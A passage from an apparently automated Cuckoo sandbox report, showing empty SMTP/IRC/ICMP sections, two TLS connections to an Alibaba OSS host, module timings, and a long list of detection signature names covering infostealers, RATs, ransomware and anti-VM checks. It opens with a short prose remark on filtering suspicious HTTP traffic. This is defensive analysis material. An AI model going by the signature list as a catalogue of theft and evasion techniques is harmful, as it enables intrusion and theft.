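```

The destination port is passed in separately because it comes from the TCP table, not from the request (the Host header carries no port). Fed proxy or IDS request logs instead of sandbox captures, the same five traits together are a reasonable first-pass filter; any one of them alone, the bare IP host in particular, is common enough in legitimate traffic to be noisy.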

SMTP traffic

No SMTP traffic.

IRC traffic

No IRC requests.

ICMP traffic

No ICMP traffic.

CIF report

No CIF results.

Network alerts

No alerts.

TLS

Timestamp Source IP Source Port Destination IP Destination Port Version Issuer Subject Fingerprint
2023-06-07 21:03:32.118987+0800 192.168.122.201 49161 59.110.117.124 443 TLS 1.2 C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G3 C=CN, ST=ZheJiang, L=HangZhou, O=Alibaba (China) Technology Co., Ltd., CN=*.oss-cn-beijing.aliyuncs.com 2f:98:c9:44:1b:39:c7:12:16:ea:ff:02:a8:5f:b0:e0:df:32:ec:44
2023-06-07 21:03:34.451194+0800 192.168.122.201 49162 59.110.117.124 443 TLS 1.2 C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G3 C=CN, ST=ZheJiang, L=HangZhou, O=Alibaba (China) Technology Co., Ltd., CN=*.oss-cn-beijing.aliyuncs.com 2f:98:c9:44:1b:39:c7:12:16:ea:ff:02:a8:5f:b0:e0:df:32:ec:44

Suricata HTTP

No Suricata HTTP

No files extracted from network traffic.
No files dropped.
No similar analyses found.

Processing (46.35 seconds; time spent by each processing module)

  • 12.41 NetworkAnalysis
  • 11.922 Static
  • 10.964 Suricata
  • 4.124 VirusTotal
  • 3.069 BehaviorAnalysis
  • 2.18 AnalysisInfo
  • 1.261 TargetInfo
  • 0.396 peid
  • 0.011 config_decoder
  • 0.011 Strings
  • 0.002 Memory

Signatures (4.402 seconds; evaluation time per signature module; every loaded signature is listed, so this is not the set of signatures that matched)

  • 1.444 network_http
  • 1.398 md_url_bl
  • 0.202 maldun_anomaly_massive_file_ops
  • 0.135 api_spamming
  • 0.097 stealth_timeout
  • 0.086 reads_self
  • 0.085 stealth_file
  • 0.085 antivm_generic_disk
  • 0.085 virus
  • 0.081 stealth_decoy_document
  • 0.074 rat_luminosity
  • 0.072 bootkit
  • 0.071 mimics_filetime
  • 0.07 maldun_malicious_write_executeable_under_temp_to_regrun
  • 0.061 maldun_anomaly_terminated_process
  • 0.056 maldun_anomaly_write_exe_and_dll_under_winroot_run
  • 0.055 maldun_anomaly_write_exe_and_obsfucate_extension
  • 0.024 antiav_detectreg
  • 0.023 ransomware_extensions
  • 0.021 antiav_detectfile
  • 0.015 infostealer_bitcoin
  • 0.015 infostealer_ftp
  • 0.011 ransomware_files
  • 0.01 md_domain_bl
  • 0.009 infostealer_im
  • 0.008 kovter_behavior
  • 0.008 antivm_vbox_files
  • 0.007 antiemu_wine_func
  • 0.007 infostealer_browser_password
  • 0.006 anomaly_persistence_autorun
  • 0.006 geodo_banking_trojan
  • 0.006 infostealer_mail
  • 0.005 antianalysis_detectreg
  • 0.004 tinba_behavior
  • 0.004 antidbg_devices
  • 0.003 antivm_vbox_libs
  • 0.002 network_tor
  • 0.002 rat_nanocore
  • 0.002 betabot_behavior
  • 0.002 kibex_behavior
  • 0.002 antivm_generic_scsi
  • 0.002 shifu_behavior
  • 0.002 exec_crash
  • 0.002 antianalysis_detectfile
  • 0.002 disables_browser_warn
  • 0.002 maldun_malicious_drop_executable_file_to_temp_folder
  • 0.002 network_torgateway
  • 0.002 rat_pcclient
  • 0.001 hawkeye_behavior
  • 0.001 antiav_avast_libs
  • 0.001 dridex_behavior
  • 0.001 antivm_vmware_libs
  • 0.001 injection_createremotethread
  • 0.001 antivm_generic_services
  • 0.001 antisandbox_sleep
  • 0.001 kazybot_behavior
  • 0.001 antisandbox_sunbelt_libs
  • 0.001 antisandbox_sboxie_libs
  • 0.001 antiav_bitdefender_libs
  • 0.001 dyre_behavior
  • 0.001 anormaly_invoke_kills
  • 0.001 cerber_behavior
  • 0.001 hancitor_behavior
  • 0.001 sniffer_winpcap
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vmware_files
  • 0.001 antivm_xen_keys
  • 0.001 banker_zeus_mutex
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_security
  • 0.001 modify_proxy
  • 0.001 codelux_behavior
  • 0.001 darkcomet_regkeys
  • 0.001 malicous_targeted_flame
  • 0.001 md_bad_drop
  • 0.001 network_cnc_http

Reporting (0.564 seconds; time spent by each reporting module)

  • 0.501 ReportHTMLSummary
  • 0.063 Malheur
Task ID 721978
Mongo ID 648080ccdc327b4794064ec4
Cuckoo release 1.4-Maldun